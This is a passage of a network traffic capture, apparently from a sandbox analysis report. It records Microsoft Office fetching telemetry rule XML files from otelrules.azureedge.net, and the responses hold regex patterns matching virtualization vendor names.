T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:41 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:41 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123141Z-r1cf579d7784wpmvhC1EWRk4cn00000004s0000000004z04 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:41 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:41 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:41 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 49c2372f-d01e-0065-7b09-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123141Z-r1cf579d778t6txphC1EWRsd4400000005wg000000001tqz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:41 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:42 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:42 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:42 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123142Z-r1cf579d778x776bhC1EWRdk8000000005ag00000000416b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:42 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:42 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:42 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123142Z-r1cf579d778d5zkmhC1EWRk6h800000005s0000000004t9u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:43 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:43 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:43 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 1f654f05-501e-008f-5009-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123143Z-r1cf579d778t6txphC1EWRsd4400000005t00000000052g6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:43 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:43 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:44 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:43 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: e27c4e9c-301e-0099-680b-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123143Z-r1cf579d7782ctslhC1EWRfbrw00000005y00000000006ng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:44 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:43 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:44 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:43 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 90a1454b-001e-0079-3203-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123143Z-r1cf579d778w59f9hC1EWRze6w00000005p00000000021v1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:44 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:44 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:44 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:44 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 8a885dcd-801e-0078-280b-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123144Z-r1cf579d778xr2r4hC1EWRqvfs00000005gg0000000002rf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:44 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:44 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:44 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 337dc70d-a01e-0053-5e05-488603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123144Z-r1cf579d77898tqwhC1EWRf9q800000005e0000000002cxy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:45 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.6	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:45 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:45 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:45 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 32d588ee-b01e-003e-0206-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123145Z-r1cf579d77898tqwhC1EWRf9q800000005c0000000003zr4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:45 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.6	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:45 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:46 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 09205d62-a01e-0021-3a05-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123146Z-r1cf579d778xq4f9hC1EWRx41g0000000590000000000qtz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:46 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.6	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:45 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:46 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:46 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 7e558585-401e-0047-1037-498597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123146Z-r1cf579d778z4wflhC1EWRa3h000000005b0000000004gee x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:46 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" 